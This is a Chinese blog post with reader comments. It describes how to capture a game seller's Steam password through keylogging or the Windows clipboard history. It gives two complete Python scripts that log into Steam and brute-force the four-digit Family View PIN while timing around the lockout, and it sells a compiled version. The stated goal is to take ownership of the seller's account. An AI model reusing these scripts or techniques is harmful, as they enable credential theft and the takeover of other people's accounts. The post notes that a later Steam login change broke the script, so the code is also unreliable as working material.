Steam家庭监护爆破
浏览 13217 | 评论 56 | 字数 10925
卖女孩的小火柴 - 搬砖中
2020年01月04日

我去淘宝买了一个游戏的Steam离线版,实际上就是给你个账户下载安装后以离线模式运行,配合上Steam账户管理器玩起来感觉还是很不错的
但我总是对客户端上的 家庭监护 标志耿耿于怀...

失效

已确认 Steam 更换了登录算法,本文的脚本失效。

怎么搞到账户密码?

对很多店来说,他们不愿意把账户密码给你,更愿意直接远程,然后输入账户和密码,全部设置好后给设置为离线模式。
这个其实很好搞,Steam本身保护并不是非常到位,你可以采取记录键盘的方式记录下输入的密码,如果遇到和我一样偷懒复制粘贴的店家,你只需要借助Win自带的剪贴板历史(Win徽标+V)打开后就可以看到复制来的账户和密码啦~~~

怎么搞到家庭监护的Key?

Steam客户端和Steam网页都会被监护影响,经过测试,无论是客户端还是网页,都是输错5次暂停3分钟输入,那当然选择网页折腾啦~~
抓包的过程也很简单,需要注意的是,有个参数是附在网页中传递来的,需要取出来,然后遇到错误暂停3分钟继续咯。。。

rsa.js.zip
下面是脚本:

# !/user/bin/env python
# -*- coding:utf-8 -*- 
# time: 2018/9/6--19:24
__author__ = 'Henry'
# I use his login code ,thx him
__sauthor__ = 'zponds'

'''
Steam login (RSA)
URL:https://store.steampowered.com/login/
'''

import requests
import time
import re
import execjs
import json

def steam_login():
    req = requests.session()
    headers = {
        'Referer': 'https://store.steampowered.com/login/',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \
Chrome/79.0.3945.88 Safari/537.36 Edg/79.0.309.54',
    }
    url = 'https://store.steampowered.com/login/getrsakey/'
    data = {
        'donotcache': str(int(time.time() * 1000)),
        'username': user
    }
    html = req.post(url, data=data, headers=headers).json()
    pub_mod = html.get('publickey_mod')
    pub_exp = html.get('publickey_exp')
    timestamp = html.get('timestamp')

    with open('rsa.js', encoding='utf-8') as f:
        jsdata = f.read()
    passencrypt = execjs.compile(jsdata).call('getpwd', password, pub_mod, pub_exp)
    print(passencrypt)
    # login
    url = 'https://store.steampowered.com/login/dologin/'
    data = {
        'donotcache': str(int(time.time() * 1000)),
        'username': user,
        'password': passencrypt,
        'twofactorcode': '',
        'emailauth': '',
        'loginfriendlyname': '',
        'captchagid': '-1',
        'captcha_text': '',
        'emailsteamid': '',
        'rsatimestamp': timestamp,
        'remember_login': 'false',
    }
    html = req.post(url, data=data, headers=headers).json()
    if html.get('emailauth_needed') == True:
        print('Login requires your email verification code')
        emailid = html.get('emailsteamid')
        email = input('Please enter your email verification code:')
        # login again
        data['emailauth'] = email
        data['emailsteamid'] = emailid
        html = req.post(url, data=data, headers=headers).json()
        print(html)
        if html.get('login_complete') == True and html.get('success') == True:
            print('logining...')
            url_store = 'https://store.steampowered.com/'
            html = req.get(url_store, headers=headers).text
            username = re.findall(r'data-miniprofile=".*?">(.*?)</a>', html)[0]
            print('[Success!Username:' + username + ']')
            r = req.get('https://store.steampowered.com/parental/blocked')
            if '/parental/unlock' in r.text:
                print('The account has a family view')
                sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
                success = False
                start = input('PIN from:')
                start_time = int(time.time())
                for pin in range(int(start) - 1, 10000):
                    flag = True
                    while flag:
                        # 取出sessionID
                        pin_str = str(pin)
                        while len(pin_str) < 4:
                            pin_str = "0" + pin_str
                        data = {
                            'pin': pin_str,
                            'sessionid': sessionID
                        }
                        try:
                            r = req.post('https://store.steampowered.com/parental/ajaxunlock', data=data,
                                         headers=headers)
                            r_json = json.loads(r.text)
                            if r_json['success'] == False:
                                if 'wait a while' in r_json['error_message']:
                                    print('Sleep...')
                                    time.sleep(180)
                                    r = req.get('https://store.steampowered.com/parental/blocked')
                                    sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
                                else:
                                    flag = False
                                    print("PIN: %s: %s" % (pin_str, r_json['error_message']))
                            else:
                                print("PIN: %s: SUCCESS!" % pin_str)
                                end_time = int(time.time())
                                print("Time: %ds" % (end_time-start_time))
                                success = True
                        except BaseException as e:
                            print('Error...')
                            time.sleep(10)
                        if success:
                            exit(0)
                else:
                    print('The account does not have a family view')
        else:
            print('login fail...')
    elif html.get('success') == False and html.get('message') != '':
        print(html.get('message'))
        print('login fail...')


if __name__ == '__main__':
    user = input('account:')
    password = input('password:')
    steam_login()

0000-9999 Pin 3分钟可以尝试5次,运气再差也就2-3天的事情吧~找台服务器放着就好啦~

搞到KEY之后?

解除掉家庭监护就可以添加家庭共享啦~
接下来这个账户的使用权就属于你啦~

什么?不会运行Python?

没有关系,我已经准备好了一个WINDOWS开箱即用的版本了!购买附件,下载后可以直接使用!
同时附赠一次指导!

2020年3月18日更新

  • 掉线后会自动尝试重新登录
  • 结束后会要求输入EXIT以退出
  • BUG修复
  • 当然,编译的WINDOWS文件也更新了
# !/user/bin/env python
# -*- coding:utf-8 -*- 
# time: 2018/9/6--19:24
__author__ = 'Henry'
# I use his login code ,thx him
__sauthor__ = 'zponds'

'''
Steam login (RSA)
URL:https://store.steampowered.com/login/
'''

import requests
import time
import re
import execjs
import json

def steam_login(open_start=-1):
    req = requests.session()
    headers = {
        'Referer': 'https://store.steampowered.com/login/',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \
Chrome/79.0.3945.88 Safari/537.36 Edg/79.0.309.54',
    }
    url = 'https://store.steampowered.com/login/getrsakey/'
    data = {
        'donotcache': str(int(time.time() * 1000)),
        'username': user
    }
    html = req.post(url, data=data, headers=headers).json()
    pub_mod = html.get('publickey_mod')
    pub_exp = html.get('publickey_exp')
    timestamp = html.get('timestamp')

    with open('rsa.js', encoding='utf-8') as f:
        jsdata = f.read()
    passencrypt = execjs.compile(jsdata).call('getpwd', password, pub_mod, pub_exp)
    # print(passencrypt)
    # login
    url = 'https://store.steampowered.com/login/dologin/'
    data = {
        'donotcache': str(int(time.time() * 1000)),
        'username': user,
        'password': passencrypt,
        'twofactorcode': '',
        'emailauth': '',
        'loginfriendlyname': '',
        'captchagid': '-1',
        'captcha_text': '',
        'emailsteamid': '',
        'rsatimestamp': timestamp,
        'remember_login': 'true',
    }
    html = req.post(url, data=data, headers=headers).json()
    if html.get('emailauth_needed') == True:
        print('登陆需要邮箱验证码...')
        emailid = html.get('emailsteamid')
        email = input('请输入验证码:')
        # login again
        data['emailauth'] = email
        data['emailsteamid'] = emailid
        html = req.post(url, data=data, headers=headers).json()
        # print(html)
    if html.get('login_complete') == True and html.get('success') == True:
        print('logining...')
        url_store = 'https://store.steampowered.com/'
        html = req.get(url_store, headers=headers).text
        username = re.findall(r'data-miniprofile=".*?">(.*?)</a>', html)[0]
        print('[登陆成功!用户名:' + username + ']')
        r = req.get('https://store.steampowered.com/parental/blocked')
        if '/parental/unlock' in r.text:
            print('这个账户存在家庭监护')
            sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
            success = False
            if open_start == -1:
                start = input('从多少开始PIN(第一次运行请从0000开始):')
            else:
                start = open_start
            start_time = int(time.time())
            for pin in range(int(start) - 1, 10000):
                flag = True
                while flag:
                    # 取出sessionID
                    pin_str = str(pin)
                    while len(pin_str) < 4:
                        pin_str = "0" + pin_str
                    data = {
                        'pin': pin_str,
                        'sessionid': sessionID
                    }
                    try:
                        r = req.post('https://store.steampowered.com/parental/ajaxunlock', data=data,
                                     headers=headers)
                        if len(r.text) > 2000:
                            return steam_login(pin)
                        r_json = json.loads(r.text)
                        if r_json['success'] == False:
                            if 'wait a while'  in r_json['error_message'] or '错误尝试' in r_json['error_message']:
                                print('等待中...')
                                time.sleep(180)
                                r = req.get('https://store.steampowered.com/parental/blocked')
                                sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
                            else:
                                flag = False
                                print("PIN: %s: %s" % (pin_str, r_json['error_message']))
                        else:
                            print("PIN: %s: 成功!" % pin_str)
                            end_time = int(time.time())
                            print("Time: %ds" % (end_time-start_time))
                            success = True
                    except BaseException as e:
                        print('Error...')
                        time.sleep(10)
                    if success:
                        return
        else:
            print('您的账户不存在家庭监护!')
    else:
        print(html.get('message'))
        print('登陆失败...')


if __name__ == '__main__':
    user = input('账户名:')
    password = input('密码:')
    print('注意,跑PIN耗时可能非常长...可能长达两天...')
    steam_login()
    end = input('输入 EXIT 以退出...')
    while end != 'EXIT':
        end = input('输入 EXIT 以退出...')
本文作者:卖女孩的小火柴 - 搬砖中
本文链接:https://www.shinenet.cn/archives/82.html
最后修改时间:2023-12-19 21:53:36
本站未注明转载的文章均为原创,并采用 CC BY-NC-SA 4.0 授权协议,转载请注明来源,谢谢!
评论
如果可能,请填写真实邮箱,有回复会送至邮箱。请不要水评论,谢谢。
textsms
支持 Markdown 语法
email
link
评论列表
已有 56 条评论
DIO
2020-04-18 09:53
SyntaxError: multiple statements found while compiling a single statement是怎么回事啊 ⌇●﹏●⌇
DIO
2020-04-18 10:02
@DIO 脚本输在哪啊? ⌇●﹏●⌇
2020-04-18 11:50
@DIO 请勿在交互式界面输入!
000
2020-04-13 16:54
大佬,代码怎样运行啊  ̄﹃ ̄
2020-04-13 22:36
@000 需要有Python和Node.js环境
安装好相关包后即可运行
000
2020-04-15 18:30
@卖女孩的小火柴 那这代码应该打在那 (´இ皿இ`)
2020-04-18 00:14
@000 emmm
反正别打在交互式页面就行
698
2020-04-07 18:36
在吗qq1492630692加一下想请教你
2020-04-07 18:38
@698 有问题请直接评论 会回复
698
2020-04-07 18:50
@卖女孩的小火柴 我的运行不了,好像没有运行环境
2020-04-07 18:51
@698 提示啥
2020-04-06 16:17
大佬,在不在
我运行不起来
安装了node。js也不行
2020-04-06 16:34
@的 qq2497019627
2020-04-06 16:43
@的 怎么了,是报错还是啥
Joseph
2020-04-04 20:41
大佬能不能具体教程讲一下(小白)qq2301296166
2020-04-04 20:42
@Joseph 你的问题有点笼统,代码已经给出来了,应该是不需要教程的,运行即可